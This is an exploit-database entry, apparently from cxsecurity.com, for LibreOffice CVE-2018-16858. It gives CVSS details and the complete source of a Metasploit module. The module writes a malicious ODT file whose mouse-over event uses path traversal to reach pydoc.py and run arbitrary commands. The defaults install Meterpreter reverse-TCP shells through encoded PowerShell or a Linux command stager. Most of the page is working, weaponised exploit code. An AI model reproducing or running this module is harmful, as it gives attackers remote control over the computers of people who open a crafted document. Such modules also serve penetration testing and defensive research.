LibreOffice Macro Code Execution

2019.04.18
Credit: Alex Infuhr
Risk: High
Local: Yes
Remote: No
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Powershell include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'LibreOffice Macro Code Execution', 'Description' => %q{ LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events to them. A macro can be tied to a program event by including the script that contains the macro and the function name to be executed. Additionally, a directory traversal vulnerability exists in the component that references the Python script to be executed. This allows a program event to execute functions from Python scripts relative to the path of the samples macros folder. The pydoc.py script included with LibreOffice contains the tempfilepager function that passes arguments to os.system, allowing RCE. This module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alex Inführ', # Vulnerability discovery and PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'CVE', '2018-16858' ], [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ] ], 'Platform' => [ 'win', 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Targets' => [ [ 'Windows', { 'Platform' => 'win', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Payload' => 'windows/meterpreter/reverse_tcp', 'DefaultOptions' => { 'PrependMigrate' => true } } ], [ 'Linux', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Payload' => 'linux/x86/meterpreter/reverse_tcp', 'DefaultOptions' => { 'PrependFork' => true }, 'CmdStagerFlavor' => 'printf', } ] ], 'DisclosureDate' => "Oct 18, 2018", 'DefaultTarget' => 0 )) register_options( [ OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']) ]) end def gen_windows_cmd opts = { :remove_comspec => true, :method => 'reflection', :encode_final_payload => true } @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts) @cmd << ' &amp;&amp; echo' end def gen_linux_cmd @cmd = generate_cmdstager.first @cmd << ' &amp;&amp; echo' end def gen_file(path) text_content = Rex::Text.rand_text_alpha(10..15) # file from Alex Inführ's PoC post referenced above fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb')) libre_file = ERB.new(fodt_file).result(binding()) libre_file rescue Errno::ENOENT fail_with(Failure::NotFound, 'Cannot find template file') end def exploit path = '../../../program/python-core-3.5.5/lib/pydoc.py' if datastore['TARGET'] == 0 gen_windows_cmd elsif datastore['TARGET'] == 1 gen_linux_cmd else fail_with(Failure::BadConfig, 'A formal target was not chosen.') end fodt_file = gen_file(path) file_create(fodt_file) end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top